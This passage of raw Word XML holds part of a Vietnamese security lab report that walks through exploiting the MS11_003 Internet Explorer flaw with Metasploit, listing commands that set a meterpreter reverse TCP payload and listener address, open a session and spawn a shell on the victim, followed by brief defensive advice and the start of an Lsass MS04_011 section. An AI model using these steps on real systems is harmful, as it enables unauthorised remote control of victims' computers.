          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>URIPATH /</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> để thiết lập đường dẫn đánh lừa victim. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF0949" w14:textId="77777777" w:rsidR="00A90697" w:rsidRDefault="00A90697" w:rsidP="00BF1B5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA39535" w14:textId="0673F48A" w:rsidR="00A90697" w:rsidRDefault="00A90697" w:rsidP="00A90697">
      <w:pPr>
        <w:ind w:firstLine="567"/>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Gõ lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> với mục đích để chiếm phiên làm việc của victim. Tạo payload lắng nghe trên địa chỉ của</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacker và port 444 bằng lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>set LHOST 10.0.0.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gõ tiếp exploit để thực thi payload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2978FC65"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6E176FD3"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r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ta tìm cách đánh lừa người dùng truy cập vào dường dẫn trên máy attacker để chiếm quyền điều khiển.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2EAE5" w14:textId="77777777" w:rsidR="00A90697" w:rsidRDefault="00A90697" w:rsidP="00A90697">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4871A4D0" w14:textId="1429E27F" w:rsidR="00A90697" w:rsidRPr="00A90697" w:rsidRDefault="00A90697" w:rsidP="00A90697">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="649F2595" wp14:editId="7302A34C">
            <wp:extent cx="3708400" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="Picture 34" descr="https://2.bp.blogspot.com/-pEA6WoXZhhg/Vv-CMX02jHI/AAAAAAAAATs/TQlnxffzpYM4oVEmCk50Y5EwKJI_WEOwQ/s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pEA6WoXZhhg/Vv-CMX02jHI/AAAAAAAAATs/TQlnxffzpYM4oVEmCk50Y5EwKJI_WEOwQ/s40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0" cy="533400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21777341" w14:textId="03D99512"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4D388152"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0BC5FFF5" w14:textId="21F7FC7F" w:rsidR="00A90697" w:rsidRDefault="00A90697" w:rsidP="00A90697">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Người dùng truy cập vào đường dẫn trên máy attacker đã được thiết lập mã độ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">c. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sau khi người dùng nhiễm mã độc trên trình duyệt IE sẽ bị treo và không tắt được</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1243C" w14:textId="77777777" w:rsidR="00A90697" w:rsidRDefault="00A90697" w:rsidP="00A90697">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419E60CA" w14:textId="3C27F550" w:rsidR="00A90697" w:rsidRDefault="00A90697" w:rsidP="00A90697">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp ta sẽ gõ lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF094E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> và gõ lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF094E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sessions –i 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> để tương tác với sessions 1. Gõ lệnh sysinfo để xem thông tin về máy victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7890FC3D" w14:textId="77777777" w:rsidR="00EF094E" w:rsidRDefault="00EF094E" w:rsidP="00A90697">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E738E8A" w14:textId="77777777" w:rsidR="00EF094E" w:rsidRDefault="00EF094E" w:rsidP="00EF094E">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF094E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bắt đầu chiếm quyền điều khiển máy victim với lệnh shell. Sau đó ta có thể tạo thư mục để đánh dấu mình đã xâm nhập thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222FFF67" w14:textId="77777777" w:rsidR="00EF094E" w:rsidRDefault="00EF094E" w:rsidP="00EF094E">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AEA4AED" w14:textId="3DFB2146" w:rsidR="00EF094E" w:rsidRPr="00EF094E" w:rsidRDefault="00EF094E" w:rsidP="00EF094E">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF094E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cách bảo mật và phòng tránh tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FC3146" w14:textId="77777777" w:rsidR="00EF094E" w:rsidRPr="00EF094E" w:rsidRDefault="00EF094E" w:rsidP="00EF094E">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0CEC8F" w14:textId="77777777" w:rsidR="00EF094E" w:rsidRDefault="00EF094E" w:rsidP="00EF094E">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF094E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lỗi MS11_003 thông qua gửi các tập tin html và css để chạy các đoạn mã nhằm xâm nhập máy tính nạn nhân để có thể đạt được quyền ngang bằng với quyền hạn của người truy cập lúc bấy giờ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A488385" w14:textId="77777777" w:rsidR="00EF094E" w:rsidRPr="00EF094E" w:rsidRDefault="00EF094E" w:rsidP="00EF094E">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D29B096" w14:textId="4BAC9FD1" w:rsidR="00EF094E" w:rsidRDefault="00EF094E" w:rsidP="007E3DBF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF094E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E3DBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EF094E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Để tránh bị hacker lợi dụng lỗi MS11_003 để chiếm quyền điều khiển máy tính của mình thì người dùng sử dụng Windows 7 không nên sử dụng trình duyệt IE. Trình duyệt IE trên Windows 7 chưa lỗ hổng bảo mật nghiêm trọng để các hacker có thể dễ dang khai thác và tấn công máy người dùng. Ta có thể sử dụng các trình duyệt bảo mật tốt hơn hiện nay được rất nhiều người sử dụng như: Chrome, Firefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> hay trình duyệt Microsoft Edg</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF094E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9F8716" w14:textId="77777777" w:rsidR="00C67A2F" w:rsidRDefault="00C67A2F" w:rsidP="00C67A2F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0E4716" w14:textId="27E44716" w:rsidR="00C67A2F" w:rsidRDefault="00C67A2F" w:rsidP="00C67A2F">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IV.4.2. Lỗi Lsass_ms04_011</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E896AF" w14:textId="48CE5EF3" w:rsidR="007E3DBF" w:rsidRPr="007E3DBF" w:rsidRDefault="00C67A2F" w:rsidP="007E3DBF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007E3DBF" w:rsidRPr="007E3DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Đây là lỗi tràn stack trong dịch vụ LSA</w:t>
      </w:r>
      <w:r w:rsidR="007E3DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="007E3DBF" w:rsidRPr="007E3DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Local Security Authority).</w:t>
      </w:r>
      <w:r w:rsidR="007E3DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E3DBF" w:rsidRPr="007E3DBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lsass.exe là một process của hệ thống Microsoft Windows, chịu trách nhiệm về chứng thực local security, quản lý Active Directory và các chính sách login. Lsass kiểm sóat việc chứng thực của cả client và server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C893C8A" w14:textId="7140CC4E" w:rsidR="00C67A2F" w:rsidRDefault="007E3DBF"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p>
    <w:p w14:paraId="301D5B35" w14:textId="21B6AEA5" w:rsidR="007E3DBF" w:rsidRDefault="007E3DBF" w:rsidP="007E3DBF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>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t>Để tấn công bằng lổ hổng này ta thực hiện các bước sau:</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="007E3DBF" w:rsidSect="007E3DBF">
      <w:headerReference w:type="default" r:id="rId3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93D0" w14:textId="77777777" w:rsidR="00881F49" w:rsidRDefault="00881F49" w:rsidP="00372720">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="01D3E4C8" w14:textId="77777777" w:rsidR="00881F49" w:rsidRDefault="00881F49" w:rsidP="003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5232" w14:textId="77777777" w:rsidR="00881F49" w:rsidRDefault="00881F49" w:rsidP="00372720">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="59CC10DB" w14:textId="77777777" w:rsidR="00881F49" w:rsidRDefault="00881F49" w:rsidP="00372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4D2F" w14:textId="77777777" w:rsidR="0069098A" w:rsidRDefault="0069098A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:lang w:val="vi-VN"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="47EC3F56" w14:textId="77777777" w:rsidR="0069098A" w:rsidRPr="00372720" w:rsidRDefault="0069098A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>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40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EC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7F6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2F8290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07D52769"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="539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2099"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7948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734D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41B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C0328"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B5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C58"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9062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440BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D3293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nsid w:val="1DF2139C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="194CC62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9">
    <w:nsid w:val="226076B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5D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738E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED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5F36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BEF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07E9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9A3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95D0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="656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83443"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="591E2D62"/>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5">
    <w:nsid w:val="2D346FEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="958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7750F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3CD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161A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4C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12A04"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33E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118C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FA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E583C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63EA6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44E65FA1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E13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6354E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="779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B6719"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CFF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90627"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60F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860CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE8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C1C03"/>
